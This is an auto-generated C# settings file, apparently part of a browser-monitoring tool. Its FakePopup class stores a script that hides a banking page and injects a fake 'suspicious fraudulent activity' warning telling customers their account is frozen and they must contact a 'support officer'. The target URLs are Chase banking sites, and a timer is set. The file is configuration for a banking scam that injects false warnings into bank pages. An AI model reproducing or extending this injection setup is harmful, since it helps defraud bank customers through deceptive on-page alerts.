//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace BrowserTabsMonitor {
    
    
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "15.9.0.0")]
    internal sealed partial class FakePopup : global::System.Configuration.ApplicationSettingsBase {
        
        private static FakePopup defaultInstance = ((FakePopup)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new FakePopup())));
        
        public static FakePopup Default {
            get {
                return defaultInstance;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute(@"<div style=""$_jsCSS_$""><h1>WARNING!</h1><h2>SUSPICIOUS FRAUDULENT ACTIVITY DETECTED!</h2><p>Dear Customer, we detected some suspicious transactions on your bank account and froze your access to comply with local law. Please contact your support officer as soon as possible.</p></div>")]
        public string jsPopupElement {
            get {
                return ((string)(this["jsPopupElement"]));
            }
            set {
                this["jsPopupElement"] = value;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("padding: 10%; margin: 10px; width: 99%; height: 100%; display: block; text-align:" +
            " center; font-size: 30px; border: 6px solid red; background-color: grey;")]
        public string jsCSS {
            get {
                return ((string)(this["jsCSS"]));
            }
            set {
                this["jsCSS"] = value;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute(@"<?xml version=""1.0"" encoding=""utf-16""?>
<ArrayOfString xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
  <string>chase.com</string>
  <string>chaseonline</string>
  <string>demo-online-banking</string>
</ArrayOfString>")]
        public global::System.Collections.Specialized.StringCollection matchUrls {
            get {
                return ((global::System.Collections.Specialized.StringCollection)(this["matchUrls"]));
            }
            set {
                this["matchUrls"] = value;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("document.getElementById(\'body\').style.display=\'none\';document.body.insertAdjacent" +
            "HTML(\'beforeend\', \'$_jsPopupElement_$\');")]
        public string jsCommand {
            get {
                return ((string)(this["jsCommand"]));
            }
            set {
                this["jsCommand"] = value;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("5000")]
        public int aTimerTimespan {
            get {
                return ((int)(this["aTimerTimespan"]));
            }
            set {
                this["aTimerTimespan"] = value;
            }
        }
    }
}
